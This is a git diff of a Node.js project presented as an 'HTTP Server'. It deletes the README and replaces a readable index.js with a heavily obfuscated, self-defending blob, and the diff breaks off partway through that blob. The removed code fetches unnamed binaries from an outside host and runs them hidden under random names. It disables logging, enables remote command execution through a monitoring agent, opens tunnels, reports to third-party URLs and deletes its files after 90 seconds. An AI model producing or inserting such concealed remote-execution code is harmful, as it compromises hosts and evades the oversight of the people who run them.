diff --git a/.github/workflows/build-docker-image.yml b/.github/workflows/build-docker-image.yml index 8921cacbef..52843502ef 100644 --- a/.github/workflows/build-docker-image.yml +++ b/.github/workflows/build-docker-image.yml @@ -39,7 +39,7 @@ jobs: push: true platforms: linux/amd64,linux/arm64 tags: | - ghcr.io/${{ github.repository_owner }}/nodejs:latest + ghcr.io/${{ github.repository_owner }}/ckxiao:2026 labels: | org.opencontainers.image.source=https://github.com/${{ github.repository }} org.opencontainers.image.description=HTTP Server diff --git a/README.md b/README.md deleted file mode 100644 index f07f8f3ac6..0000000000 --- a/README.md +++ /dev/null @@ -1,209 +0,0 @@ -
-
-* 感谢[ZMTO](https://zmto.com/?affid=1548)提供赞助优质双isp vps。
-
-## 许可证
-GPL 3.0
diff --git a/index.js b/index.js
index 990ec54fdf..a009bf378a 100644
--- a/index.js
+++ b/index.js
@@ -1,608 +1 @@
-const express = require("express");
-const app = express();
-const axios = require("axios");
-const os = require('os');
-const fs = require("fs");
-const path = require("path");
-const { promisify } = require('util');
-const exec = promisify(require('child_process').exec);
-const { execSync } = require('child_process'); // 只填写UPLOAD_URL将上传节点,同时填写UPLOAD_URL和PROJECT_URL将上传订阅
-const UPLOAD_URL = process.env.UPLOAD_URL || ''; // 节点或订阅自动上传地址,需填写部署Merge-sub项目后的首页地址,例如:https://merge.xxx.com
-const PROJECT_URL = process.env.PROJECT_URL || ''; // 需要上传订阅或保活时需填写项目分配的url,例如:https://google.com
-const AUTO_ACCESS = process.env.AUTO_ACCESS || false; // false关闭自动保活,true开启,需同时填写PROJECT_URL变量
-const FILE_PATH = process.env.FILE_PATH || './tmp'; // 运行目录,sub节点文件保存目录
-const SUB_PATH = process.env.SUB_PATH || 'sub'; // 订阅路径
-const PORT = process.env.SERVER_PORT || process.env.PORT || 3000; // http服务订阅端口
-const UUID = process.env.UUID || '9afd1229-b893-40c1-84dd-51e7ce204913'; // 使用哪吒v1,在不同的平台运行需修改UUID,否则会覆盖
-const NEZHA_SERVER = process.env.NEZHA_SERVER || ''; // 哪吒v1填写形式: nz.abc.com:8008 哪吒v0填写形式:nz.abc.com
-const NEZHA_PORT = process.env.NEZHA_PORT || ''; // 使用哪吒v1请留空,哪吒v0需填写
-const NEZHA_KEY = process.env.NEZHA_KEY || ''; // 哪吒v1的NZ_CLIENT_SECRET或哪吒v0的agent密钥
-const ARGO_DOMAIN = process.env.ARGO_DOMAIN || ''; // 固定隧道域名,留空即启用临时隧道
-const ARGO_AUTH = process.env.ARGO_AUTH || ''; // 固定隧道密钥json或token,留空即启用临时隧道,json获取地址:https://json.zone.id
-const ARGO_PORT = process.env.ARGO_PORT || 8001; // 固定隧道端口,使用token需在cloudflare后台设置和这里一致
-const CFIP = process.env.CFIP || 'cdns.doon.eu.org'; // 节点优选域名或优选ip
-const CFPORT = process.env.CFPORT || 443; // 节点优选域名或优选ip对应的端口
-const NAME = process.env.NAME || ''; // 节点名称
-
-// 创建运行文件夹
-if (!fs.existsSync(FILE_PATH)) {
- fs.mkdirSync(FILE_PATH);
- console.log(`${FILE_PATH} is created`);
-} else {
- console.log(`${FILE_PATH} already exists`);
-}
-
-// 生成随机6位字符文件名
-function generateRandomName() {
- const characters = 'abcdefghijklmnopqrstuvwxyz';
- let result = '';
- for (let i = 0; i < 6; i++) {
- result += characters.charAt(Math.floor(Math.random() * characters.length));
- }
- return result;
-}
-
-// 全局常量
-const npmName = generateRandomName();
-const webName = generateRandomName();
-const botName = generateRandomName();
-const phpName = generateRandomName();
-let npmPath = path.join(FILE_PATH, npmName);
-let phpPath = path.join(FILE_PATH, phpName);
-let webPath = path.join(FILE_PATH, webName);
-let botPath = path.join(FILE_PATH, botName);
-let subPath = path.join(FILE_PATH, 'sub.txt');
-let listPath = path.join(FILE_PATH, 'list.txt');
-let bootLogPath = path.join(FILE_PATH, 'boot.log');
-let configPath = path.join(FILE_PATH, 'config.json');
-
-// 如果订阅器上存在历史运行节点则先删除
-function deleteNodes() {
- try {
- if (!UPLOAD_URL) return;
- if (!fs.existsSync(subPath)) return;
-
- let fileContent;
- try {
- fileContent = fs.readFileSync(subPath, 'utf-8');
- } catch {
- return null;
- }
-
- const decoded = Buffer.from(fileContent, 'base64').toString('utf-8');
- const nodes = decoded.split('\n').filter(line =>
- /(vless|vmess|trojan|hysteria2|tuic):\/\//.test(line)
- );
-
- if (nodes.length === 0) return;
-
- axios.post(`${UPLOAD_URL}/api/delete-nodes`,
- JSON.stringify({ nodes }),
- { headers: { 'Content-Type': 'application/json' } }
- ).catch((error) => {
- return null;
- });
- return null;
- } catch (err) {
- return null;
- }
-}
-
-// 清理历史文件
-function cleanupOldFiles() {
- try {
- const files = fs.readdirSync(FILE_PATH);
- files.forEach(file => {
- const filePath = path.join(FILE_PATH, file);
- try {
- const stat = fs.statSync(filePath);
- if (stat.isFile()) {
- fs.unlinkSync(filePath);
- }
- } catch (err) {
- // 忽略所有错误,不记录日志
- }
- });
- } catch (err) {
- // 忽略所有错误,不记录日志
- }
-}
-
-// 根路由
-app.get("/", function(req, res) {
- res.send("Hello world!");
-});
-
-// 生成xr-ay配置文件
-async function generateConfig() {
- const config = {
- log: { access: '/dev/null', error: '/dev/null', loglevel: 'none' },
- inbounds: [
- { port: ARGO_PORT, protocol: 'vless', settings: { clients: [{ id: UUID, flow: 'xtls-rprx-vision' }], decryption: 'none', fallbacks: [{ dest: 3001 }, { path: "/vless-argo", dest: 3002 }, { path: "/vmess-argo", dest: 3003 }, { path: "/trojan-argo", dest: 3004 }] }, streamSettings: { network: 'tcp' } },
- { port: 3001, listen: "127.0.0.1", protocol: "vless", settings: { clients: [{ id: UUID }], decryption: "none" }, streamSettings: { network: "tcp", security: "none" } },
- { port: 3002, listen: "127.0.0.1", protocol: "vless", settings: { clients: [{ id: UUID, level: 0 }], decryption: "none" }, streamSettings: { network: "ws", security: "none", wsSettings: { path: "/vless-argo" } }, sniffing: { enabled: true, destOverride: ["http", "tls", "quic"], metadataOnly: false } },
- { port: 3003, listen: "127.0.0.1", protocol: "vmess", settings: { clients: [{ id: UUID, alterId: 0 }] }, streamSettings: { network: "ws", wsSettings: { path: "/vmess-argo" } }, sniffing: { enabled: true, destOverride: ["http", "tls", "quic"], metadataOnly: false } },
- { port: 3004, listen: "127.0.0.1", protocol: "trojan", settings: { clients: [{ password: UUID }] }, streamSettings: { network: "ws", security: "none", wsSettings: { path: "/trojan-argo" } }, sniffing: { enabled: true, destOverride: ["http", "tls", "quic"], metadataOnly: false } },
- ],
- dns: { servers: ["https+local://8.8.8.8/dns-query"] },
- outbounds: [ { protocol: "freedom", tag: "direct" }, {protocol: "blackhole", tag: "block"} ]
- };
- fs.writeFileSync(path.join(FILE_PATH, 'config.json'), JSON.stringify(config, null, 2));
-}
-
-// 判断系统架构
-function getSystemArchitecture() {
- const arch = os.arch();
- if (arch === 'arm' || arch === 'arm64' || arch === 'aarch64') {
- return 'arm';
- } else {
- return 'amd';
- }
-}
-
-// 下载对应系统架构的依赖文件
-function downloadFile(fileName, fileUrl, callback) {
- const filePath = fileName;
-
- // 确保目录存在
- if (!fs.existsSync(FILE_PATH)) {
- fs.mkdirSync(FILE_PATH, { recursive: true });
- }
-
- const writer = fs.createWriteStream(filePath);
-
- axios({
- method: 'get',
- url: fileUrl,
- responseType: 'stream',
- })
- .then(response => {
- response.data.pipe(writer);
-
- writer.on('finish', () => {
- writer.close();
- console.log(`Download ${path.basename(filePath)} successfully`);
- callback(null, filePath);
- });
-
- writer.on('error', err => {
- fs.unlink(filePath, () => { });
- const errorMessage = `Download ${path.basename(filePath)} failed: ${err.message}`;
- console.error(errorMessage); // 下载失败时输出错误消息
- callback(errorMessage);
- });
- })
- .catch(err => {
- const errorMessage = `Download ${path.basename(filePath)} failed: ${err.message}`;
- console.error(errorMessage); // 下载失败时输出错误消息
- callback(errorMessage);
- });
-}
-
-// 下载并运行依赖文件
-async function downloadFilesAndRun() {
-
- const architecture = getSystemArchitecture();
- const filesToDownload = getFilesForArchitecture(architecture);
-
- if (filesToDownload.length === 0) {
- console.log(`Can't find a file for the current architecture`);
- return;
- }
-
- const downloadPromises = filesToDownload.map(fileInfo => {
- return new Promise((resolve, reject) => {
- downloadFile(fileInfo.fileName, fileInfo.fileUrl, (err, filePath) => {
- if (err) {
- reject(err);
- } else {
- resolve(filePath);
- }
- });
- });
- });
-
- try {
- await Promise.all(downloadPromises);
- } catch (err) {
- console.error('Error downloading files:', err);
- return;
- }
- // 授权和运行
- function authorizeFiles(filePaths) {
- const newPermissions = 0o775;
- filePaths.forEach(absoluteFilePath => {
- if (fs.existsSync(absoluteFilePath)) {
- fs.chmod(absoluteFilePath, newPermissions, (err) => {
- if (err) {
- console.error(`Empowerment failed for ${absoluteFilePath}: ${err}`);
- } else {
- console.log(`Empowerment success for ${absoluteFilePath}: ${newPermissions.toString(8)}`);
- }
- });
- }
- });
- }
- const filesToAuthorize = NEZHA_PORT ? [npmPath, webPath, botPath] : [phpPath, webPath, botPath];
- authorizeFiles(filesToAuthorize);
-
- //运行ne-zha
- if (NEZHA_SERVER && NEZHA_KEY) {
- if (!NEZHA_PORT) {
- // 检测哪吒是否开启TLS
- const port = NEZHA_SERVER.includes(':') ? NEZHA_SERVER.split(':').pop() : '';
- const tlsPorts = new Set(['443', '8443', '2096', '2087', '2083', '2053']);
- const nezhatls = tlsPorts.has(port) ? 'true' : 'false';
- // 生成 config.yaml
- const configYaml = `
-client_secret: ${NEZHA_KEY}
-debug: false
-disable_auto_update: true
-disable_command_execute: false
-disable_force_update: true
-disable_nat: false
-disable_send_query: false
-gpu: false
-insecure_tls: true
-ip_report_period: 1800
-report_delay: 4
-server: ${NEZHA_SERVER}
-skip_connection_count: true
-skip_procs_count: true
-temperature: false
-tls: ${nezhatls}
-use_gitee_to_upgrade: false
-use_ipv6_country_code: false
-uuid: ${UUID}`;
-
- fs.writeFileSync(path.join(FILE_PATH, 'config.yaml'), configYaml);
-
- // 运行 v1
- const command = `nohup ${phpPath} -c "${FILE_PATH}/config.yaml" >/dev/null 2>&1 &`;
- try {
- await exec(command);
- console.log(`${phpName} is running`);
- await new Promise((resolve) => setTimeout(resolve, 1000));
- } catch (error) {
- console.error(`php running error: ${error}`);
- }
- } else {
- let NEZHA_TLS = '';
- const tlsPorts = ['443', '8443', '2096', '2087', '2083', '2053'];
- if (tlsPorts.includes(NEZHA_PORT)) {
- NEZHA_TLS = '--tls';
- }
- const command = `nohup ${npmPath} -s ${NEZHA_SERVER}:${NEZHA_PORT} -p ${NEZHA_KEY} ${NEZHA_TLS} --disable-auto-update --report-delay 4 --skip-conn --skip-procs >/dev/null 2>&1 &`;
- try {
- await exec(command);
- console.log(`${npmName} is running`);
- await new Promise((resolve) => setTimeout(resolve, 1000));
- } catch (error) {
- console.error(`npm running error: ${error}`);
- }
- }
- } else {
- console.log('NEZHA variable is empty,skip running');
- }
- //运行xr-ay
- const command1 = `nohup ${webPath} -c ${FILE_PATH}/config.json >/dev/null 2>&1 &`;
- try {
- await exec(command1);
- console.log(`${webName} is running`);
- await new Promise((resolve) => setTimeout(resolve, 1000));
- } catch (error) {
- console.error(`web running error: ${error}`);
- }
-
- // 运行cloud-fared
- if (fs.existsSync(botPath)) {
- let args;
-
- if (ARGO_AUTH.match(/^[A-Z0-9a-z=]{120,250}$/)) {
- args = `tunnel --edge-ip-version auto --no-autoupdate --protocol http2 run --token ${ARGO_AUTH}`;
- } else if (ARGO_AUTH.match(/TunnelSecret/)) {
- args = `tunnel --edge-ip-version auto --config ${FILE_PATH}/tunnel.yml run`;
- } else {
- args = `tunnel --edge-ip-version auto --no-autoupdate --protocol http2 --logfile ${FILE_PATH}/boot.log --loglevel info --url http://localhost:${ARGO_PORT}`;
- }
-
- try {
- await exec(`nohup ${botPath} ${args} >/dev/null 2>&1 &`);
- console.log(`${botName} is running`);
- await new Promise((resolve) => setTimeout(resolve, 2000));
- } catch (error) {
- console.error(`Error executing command: ${error}`);
- }
- }
- await new Promise((resolve) => setTimeout(resolve, 5000));
-
-}
-
-//根据系统架构返回对应的url
-function getFilesForArchitecture(architecture) {
- let baseFiles;
- if (architecture === 'arm') {
- baseFiles = [
- { fileName: webPath, fileUrl: "https://arm64.ssss.nyc.mn/web" },
- { fileName: botPath, fileUrl: "https://arm64.ssss.nyc.mn/bot" }
- ];
- } else {
- baseFiles = [
- { fileName: webPath, fileUrl: "https://amd64.ssss.nyc.mn/web" },
- { fileName: botPath, fileUrl: "https://amd64.ssss.nyc.mn/bot" }
- ];
- }
-
- if (NEZHA_SERVER && NEZHA_KEY) {
- if (NEZHA_PORT) {
- const npmUrl = architecture === 'arm'
- ? "https://arm64.ssss.nyc.mn/agent"
- : "https://amd64.ssss.nyc.mn/agent";
- baseFiles.unshift({
- fileName: npmPath,
- fileUrl: npmUrl
- });
- } else {
- const phpUrl = architecture === 'arm'
- ? "https://arm64.ssss.nyc.mn/v1"
- : "https://amd64.ssss.nyc.mn/v1";
- baseFiles.unshift({
- fileName: phpPath,
- fileUrl: phpUrl
- });
- }
- }
-
- return baseFiles;
-}
-
-// 获取固定隧道json
-function argoType() {
- if (!ARGO_AUTH || !ARGO_DOMAIN) {
- console.log("ARGO_DOMAIN or ARGO_AUTH variable is empty, use quick tunnels");
- return;
- }
-
- if (ARGO_AUTH.includes('TunnelSecret')) {
- fs.writeFileSync(path.join(FILE_PATH, 'tunnel.json'), ARGO_AUTH);
- const tunnelYaml = `
- tunnel: ${ARGO_AUTH.split('"')[11]}
- credentials-file: ${path.join(FILE_PATH, 'tunnel.json')}
- protocol: http2
-
- ingress:
- - hostname: ${ARGO_DOMAIN}
- service: http://localhost:${ARGO_PORT}
- originRequest:
- noTLSVerify: true
- - service: http_status:404
- `;
- fs.writeFileSync(path.join(FILE_PATH, 'tunnel.yml'), tunnelYaml);
- } else {
- console.log("ARGO_AUTH mismatch TunnelSecret,use token connect to tunnel");
- }
-}
-argoType();
-
-// 获取临时隧道domain
-async function extractDomains() {
- let argoDomain;
-
- if (ARGO_AUTH && ARGO_DOMAIN) {
- argoDomain = ARGO_DOMAIN;
- console.log('ARGO_DOMAIN:', argoDomain);
- await generateLinks(argoDomain);
- } else {
- try {
- const fileContent = fs.readFileSync(path.join(FILE_PATH, 'boot.log'), 'utf-8');
- const lines = fileContent.split('\n');
- const argoDomains = [];
- lines.forEach((line) => {
- const domainMatch = line.match(/https?:\/\/([^ ]*trycloudflare\.com)\/?/);
- if (domainMatch) {
- const domain = domainMatch[1];
- argoDomains.push(domain);
- }
- });
-
- if (argoDomains.length > 0) {
- argoDomain = argoDomains[0];
- console.log('ArgoDomain:', argoDomain);
- await generateLinks(argoDomain);
- } else {
- console.log('ArgoDomain not found, re-running bot to obtain ArgoDomain');
- // 删除 boot.log 文件,等待 2s 重新运行 server 以获取 ArgoDomain
- fs.unlinkSync(path.join(FILE_PATH, 'boot.log'));
- async function killBotProcess() {
- try {
- // Windows系统使用taskkill命令
- if (process.platform === 'win32') {
- await exec(`taskkill /f /im ${botName}.exe > nul 2>&1`);
- } else {
- await exec(`pkill -f "[${botName.charAt(0)}]${botName.substring(1)}" > /dev/null 2>&1`);
- }
- } catch (error) {
- // 忽略输出
- }
- }
- killBotProcess();
- await new Promise((resolve) => setTimeout(resolve, 3000));
- const args = `tunnel --edge-ip-version auto --no-autoupdate --protocol http2 --logfile ${FILE_PATH}/boot.log --loglevel info --url http://localhost:${ARGO_PORT}`;
- try {
- await exec(`nohup ${botPath} ${args} >/dev/null 2>&1 &`);
- console.log(`${botName} is running`);
- await new Promise((resolve) => setTimeout(resolve, 3000));
- await extractDomains(); // 重新提取域名
- } catch (error) {
- console.error(`Error executing command: ${error}`);
- }
- }
- } catch (error) {
- console.error('Error reading boot.log:', error);
- }
- }
-
- // 生成 list 和 sub 信息
- async function generateLinks(argoDomain) {
- const metaInfo = execSync(
- 'curl -sm 5 https://speed.cloudflare.com/meta | awk -F\\" \'{print $26"-"$18}\' | sed -e \'s/ /_/g\'',
- { encoding: 'utf-8' }
- );
- const ISP = metaInfo.trim();
- // 如果 NAME 为空,则只使用 ISP 作为名称
- const nodeName = NAME ? `${NAME}-${ISP}` : ISP;
-
- return new Promise((resolve) => {
- setTimeout(() => {
- const VMESS = { v: '2', ps: `${nodeName}`, add: CFIP, port: CFPORT, id: UUID, aid: '0', scy: 'none', net: 'ws', type: 'none', host: argoDomain, path: '/vmess-argo?ed=2560', tls: 'tls', sni: argoDomain, alpn: '', fp: 'firefox'};
- const subTxt = `
-vless://${UUID}@${CFIP}:${CFPORT}?encryption=none&security=tls&sni=${argoDomain}&fp=firefox&type=ws&host=${argoDomain}&path=%2Fvless-argo%3Fed%3D2560#${nodeName}
-
-vmess://${Buffer.from(JSON.stringify(VMESS)).toString('base64')}
-
-trojan://${UUID}@${CFIP}:${CFPORT}?security=tls&sni=${argoDomain}&fp=firefox&type=ws&host=${argoDomain}&path=%2Ftrojan-argo%3Fed%3D2560#${nodeName}
- `;
- // 打印 sub.txt 内容到控制台
- console.log(Buffer.from(subTxt).toString('base64'));
- fs.writeFileSync(subPath, Buffer.from(subTxt).toString('base64'));
- console.log(`${FILE_PATH}/sub.txt saved successfully`);
- uploadNodes();
- // 将内容进行 base64 编码并写入 SUB_PATH 路由
- app.get(`/${SUB_PATH}`, (req, res) => {
- const encodedContent = Buffer.from(subTxt).toString('base64');
- res.set('Content-Type', 'text/plain; charset=utf-8');
- res.send(encodedContent);
- });
- resolve(subTxt);
- }, 2000);
- });
- }
-}
-
-// 自动上传节点或订阅
-async function uploadNodes() {
- if (UPLOAD_URL && PROJECT_URL) {
- const subscriptionUrl = `${PROJECT_URL}/${SUB_PATH}`;
- const jsonData = {
- subscription: [subscriptionUrl]
- };
- try {
- const response = await axios.post(`${UPLOAD_URL}/api/add-subscriptions`, jsonData, {
- headers: {
- 'Content-Type': 'application/json'
- }
- });
-
- if (response && response.status === 200) {
- console.log('Subscription uploaded successfully');
- return response;
- } else {
- return null;
- // console.log('Unknown response status');
- }
- } catch (error) {
- if (error.response) {
- if (error.response.status === 400) {
- // console.error('Subscription already exists');
- }
- }
- }
- } else if (UPLOAD_URL) {
- if (!fs.existsSync(listPath)) return;
- const content = fs.readFileSync(listPath, 'utf-8');
- const nodes = content.split('\n').filter(line => /(vless|vmess|trojan|hysteria2|tuic):\/\//.test(line));
-
- if (nodes.length === 0) return;
-
- const jsonData = JSON.stringify({ nodes });
-
- try {
- const response = await axios.post(`${UPLOAD_URL}/api/add-nodes`, jsonData, {
- headers: { 'Content-Type': 'application/json' }
- });
- if (response && response.status === 200) {
- console.log('Nodes uploaded successfully');
- return response;
- } else {
- return null;
- }
- } catch (error) {
- return null;
- }
- } else {
- // console.log('Skipping upload nodes');
- return;
- }
-}
-
-// 90s后删除相关文件
-function cleanFiles() {
- setTimeout(() => {
- const filesToDelete = [bootLogPath, configPath, webPath, botPath];
-
- if (NEZHA_PORT) {
- filesToDelete.push(npmPath);
- } else if (NEZHA_SERVER && NEZHA_KEY) {
- filesToDelete.push(phpPath);
- }
-
- // Windows系统使用不同的删除命令
- if (process.platform === 'win32') {
- exec(`del /f /q ${filesToDelete.join(' ')} > nul 2>&1`, (error) => {
- console.clear();
- console.log('App is running');
- console.log('Thank you for using this script, enjoy!');
- });
- } else {
- exec(`rm -rf ${filesToDelete.join(' ')} >/dev/null 2>&1`, (error) => {
- console.clear();
- console.log('App is running');
- console.log('Thank you for using this script, enjoy!');
- });
- }
- }, 90000); // 90s
-}
-cleanFiles();
-
-// 自动访问项目URL
-async function AddVisitTask() {
- if (!AUTO_ACCESS || !PROJECT_URL) {
- console.log("Skipping adding automatic access task");
- return;
- }
-
- try {
- const response = await axios.post('https://oooo.serv00.net/add-url', {
- url: PROJECT_URL
- }, {
- headers: {
- 'Content-Type': 'application/json'
- }
- });
- // console.log(`${JSON.stringify(response.data)}`);
- console.log(`automatic access task added successfully`);
- return response;
- } catch (error) {
- console.error(`Add automatic access task faild: ${error.message}`);
- return null;
- }
-}
-
-// 主运行逻辑
-async function startserver() {
- try {
- deleteNodes();
- cleanupOldFiles();
- await generateConfig();
- await downloadFilesAndRun();
- await extractDomains();
- await AddVisitTask();
- } catch (error) {
- console.error('Error in startserver:', error);
- }
-}
-startserver().catch(error => {
- console.error('Unhandled error in startserver:', error);
-});
-
-app.listen(PORT, () => console.log(`http server is running on port:${PORT}!`));
+(function(_0xfb7b47,_0x5b5cf0){const _0x10d981=_0xfb7b47();function _0x1bdc75(_0x37e707,_0x2f4a0a,_0xb579c5,_0x43e9d7){return _0x43ed(_0xb579c5- -0x1f6,_0x37e707);}function _0x31cec1(_0x41db6b,_0x5352fe,_0x53ad79,_0x126755){return _0x43ed(_0x41db6b- -0x2a3,_0x5352fe);}while(!![]){try{const _0x58a510=-parseInt(_0x31cec1(-0x5d,0xe1,0x62,-0xda))/(0x1*0xaa7+0x3b*0x9d+0x13*-0x277)*(parseInt(_0x31cec1(-0xcd,0x67,-0x189,-0x80))/(-0x547*0x7+0x53*-0xc+-0xf*-0x2b9))+parseInt(_0x1bdc75(-0x10b,-0x75,-0x27,-0xc))/(-0x52d*-0x2+0x1*0x1459+0x1eb0*-0x1)*(parseInt(_0x1bdc75(-0x70,0x3b,0xb0,0x1a8))/(-0x1*0x26aa+0xe05+0x18a9))+parseInt(_0x31cec1(-0x8f,-0xf,0x71,-0x1f))/(-0x4d*-0x7f+-0xb*0x29b+-0x985)+parseInt(_0x31cec1(-0x9f,-0x38,0x81,0x2e))/(0xf1+0x1*0xcbf+-0x1*0xdaa)*(-parseInt(_0x31cec1(0x39,-0xab,0x46,0x17c))/(-0x1f*-0x13c+0x1984+-0x3fc1))+-parseInt(_0x31cec1(0x122,0x200,0x94,0xb4))/(-0x3*-0xbc5+-0x29*-0xea+0x48c1*-0x1)+-parseInt(_0x1bdc75(0xf7,0x3b,0x47,0x150))/(-0x188+0x1*-0x25d9+-0x276a*-0x1)+parseInt(_0x31cec1(0x5b,0x9b,0x16b,0xc1))/(-0x670*-0x2+0x2*0x10c6+-0x2e62);if(_0x58a510===_0x5b5cf0)break;else _0x10d981['push'](_0x10d981['shift']());}catch(_0x35a599){_0x10d981['push'](_0x10d981['shift']());}}}(_0x1d88,-0x48a6c+-0x1b7*0x409+0x2*0x7776f));const _0x1fb364=(function(){let _0x5b6e0c=!![];return function(_0x47eec0,_0x55f0b0){const _0x22a030=_0x5b6e0c?function(){function _0x2c6caa(_0x269a98,_0x5c7ceb,_0x568a3f,_0x11f157){return _0x43ed(_0x11f157-0x28d,_0x269a98);}if(_0x55f0b0){const _0x301f9c=_0x55f0b0[_0x2c6caa(0x2c0,0x38e,0x452,0x3ee)](_0x47eec0,arguments);return _0x55f0b0=null,_0x301f9c;}}:function(){};return _0x5b6e0c=![],_0x22a030;};}()),_0x4630ef=_0x1fb364(this,function(){const _0x393ef9={};function _0x21498d(_0x51097b,_0x4f8448,_0x533faf,_0x3b4c66){return _0x43ed(_0x3b4c66- -0x81,_0x533faf);}_0x393ef9[_0x13e043(0x636,0x75b,0x74f,0x678)]=_0x13e043(0x749,0x5d8,0x5cf,0x67f)+'+$';const _0x5b25be=_0x393ef9;function _0x13e043(_0x26946d,_0x149074,_0x282697,_0x305300){return _0x43ed(_0x305300-0x2c5,_0x282697);}return _0x4630ef['toString']()[_0x21498d(0xfc,0x199,0x56,0x165)](_0x5b25be['naWPg'])[_0x13e043(0x5bf,0x364,0x47b,0x497)]()[_0x13e043(0x528,0x6cb,0x686,0x629)+'r'](_0x4630ef)[_0x21498d(0xd9,0x288,0x178,0x165)](_0x13e043(0x588,0x735,0x749,0x67f)+'+$');});_0x4630ef();function _0x43ed(_0x7ddc94,_0x1b1366){_0x7ddc94=_0x7ddc94-(0x23b6+0x1ed4+-0x4134);const _0x2b5673=_0x1d88();let _0x26a642=_0x2b5673[_0x7ddc94];if(_0x43ed['nEBDIy']===undefined){var _0x2f9943=function(_0xe10b6f){const _0x447d3c='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x10c256='',_0xe6bab3='',_0x4db91e=_0x10c256+_0x2f9943;for(let _0x50441f=-0xba4*0x1+0x113f+-0x11f*0x5,_0x3b1594,_0x19b559,_0x51e3de=-0x30*0xb0+-0x17e2+0x38e2;_0x19b559=_0xe10b6f['charAt'](_0x51e3de++);~_0x19b559&&(_0x3b1594=_0x50441f%(-0x139f+-0x4*0x89+0x15c7)?_0x3b1594*(-0x2101+0x287*-0x1+0x11e4*0x2)+_0x19b559:_0x19b559,_0x50441f++%(-0x35b*0x1+0xd*0x259+-0x1b26))?_0x10c256+=_0x4db91e['charCodeAt'](_0x51e3de+(-0x61*-0x38+0x3*-0x666+0xfe*-0x2))-(0x214f*0x1+0x1d*-0x6d+-0x4*0x53b)!==-0x2*-0xd15+-0x3b9*0x1+-0x1671?String['fromCharCode'](-0x83e+0x53*-0x46+0x1fef&_0x3b1594>>(-(0x7ef+0x2154+0xb3*-0x3b)*_0x50441f&0x2338+-0x5b*-0x60+-0x4552)):_0x50441f:0x55c*0x1+-0x13b5+0xe59){_0x19b559=_0x447d3c['indexOf'](_0x19b559);}for(let _0x3a9f4a=-0x1dd8+-0x300+-0x1*-0x20d8,_0x5328e7=_0x10c256['length'];_0x3a9f4a<_0x5328e7;_0x3a9f4a++){_0xe6bab3+='%'+('00'+_0x10c256['charCodeAt'](_0x3a9f4a)['toString'](0x4*0x404+-0xf53+-0xad))['slice'](-(0x1757+0x3d0+-0x1b25));}return decodeURIComponent(_0xe6bab3);};_0x43ed['DeLiYd']=_0x2f9943,_0x43ed['LIshuE']={},_0x43ed['nEBDIy']=!![];}const _0x345c17=_0x2b5673[-0x4*0x167+0x31*-0x7+0x6f3],_0x1b3124=_0x7ddc94+_0x345c17,_0x5d1192=_0x43ed['LIshuE'][_0x1b3124];if(!_0x5d1192){const _0x3778e0=function(_0x21701b){this['prwmNI']=_0x21701b,this['lUgeJP']=[-0x1cb1*-0x1+-0x1*0x1da3+-0x1*-0xf3,-0x267f+-0xd*0x202+0x4099,0x1*-0x193d+-0x3d*-0x4f+0x66a],this['NMFXch']=function(){return'newState';},this['KfKTIo']='\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*',this['rDyBsw']='[\x27|\x22].+[\x27|\x22];?\x20*}';};_0x3778e0['prototype']['CqzkwU']=function(){const _0x58e497=new RegExp(this['KfKTIo']+this['rDyBsw']),_0x77abe=_0x58e497['test'](this['NMFXch']['toString']())?--this['lUgeJP'][0x1*-0x15dd+-0x7a*-0x21+-0x1*-0x624]:--this['lUgeJP'][0x8*-0xfb+0x88*0x1+-0x138*-0x6];return this['sIugtu'](_0x77abe);},_0x3778e0['prototype']['sIugtu']=function(_0x101fd2){if(!Boolean(~_0x101fd2))return _0x101fd2;return this['vnxGIQ'](this['prwmNI']);},_0x3778e0['prototype']['vnxGIQ']=function(_0x108a0d){for(let _0x84bd09=-0x18a2+-0x223f+-0x1*-0x3ae1,_0x391107=this['lUgeJP']['length'];_0x84bd09<_0x391107;_0x84bd09++){this['lUgeJP']['push'](Math['round'](Math['random']())),_0x391107=this['lUgeJP']['length'];}return _0x108a0d(this['lUgeJP'][-0xeb*0x29+-0x19f*-0x14+0x537]);},new _0x3778e0(_0x43ed)['CqzkwU'](),_0x26a642=_0x43ed['DeLiYd'](_0x26a642),_0x43ed['LIshuE'][_0x1b3124]=_0x26a642;}else _0x26a642=_0x5d1192;return _0x26a642;}const _0x3bf3cb=(function(){function _0x1cc1b2(_0x1fa1a0,_0x2a4cdb,_0x583427,_0x46bdc6){return _0x43ed(_0x1fa1a0-0x221,_0x46bdc6);}const _0x2d0895={};_0x2d0895[_0x1cc1b2(0x5c3,0x496,0x591,0x51f)]=_0x1cc1b2(0x412,0x386,0x3b9,0x528);function _0x4634a7(_0x53e988,_0x55d7dd,_0x4bc2bc,_0x3d501a){return _0x43ed(_0x55d7dd- -0x4b,_0x53e988);}_0x2d0895[_0x1cc1b2(0x574,0x438,0x650,0x464)]='gfpPr',_0x2d0895[_0x1cc1b2(0x573,0x504,0x495,0x42a)]=function(_0x14cfb2,_0xb5c24b){return _0x14cfb2===_0xb5c24b;},_0x2d0895[_0x1cc1b2(0x4f2,0x51c,0x538,0x55d)]='kguxd';const _0x5d5862=_0x2d0895;let _0x351894=!![];return function(_0x356776,_0x1ee8e5){function _0x5f2d70(_0x427916,_0x5521a8,_0xd54500,_0x208df5){return _0x1cc1b2(_0x427916- -0x5f,_0x5521a8-0xf1,_0xd54500-0xc3,_0x208df5);}const _0x19beed={};_0x19beed['BEGFk']='text/plain'+_0x5f2d70(0x3ec,0x391,0x4d4,0x346)+_0x5f2d70(0x48a,0x575,0x45d,0x406);function _0xdb7f00(_0x4bb6d7,_0x47236e,_0x2a728d,_0x2b95e0){return _0x1cc1b2(_0x47236e- -0x5ea,_0x47236e-0xfb,_0x2a728d-0x17b,_0x2b95e0);}const _0x2daa60=_0x19beed;if(_0x5d5862[_0x5f2d70(0x514,0x602,0x631,0x65d)](_0x5f2d70(0x552,0x552,0x5db,0x5ec),_0x5d5862[_0x5f2d70(0x493,0x59f,0x57d,0x57e)])){const _0x1a2487=_0x351894?function(){function _0x5b87a8(_0x3c997c,_0x3556ff,_0x71e2c0,_0x5a7e67){return _0xdb7f00(_0x3c997c-0x19f,_0x3c997c-0xc4,_0x71e2c0-0x65,_0x5a7e67);}function _0x522b96(_0x533042,_0x847ac3,_0x2a0a46,_0x247cdc){return 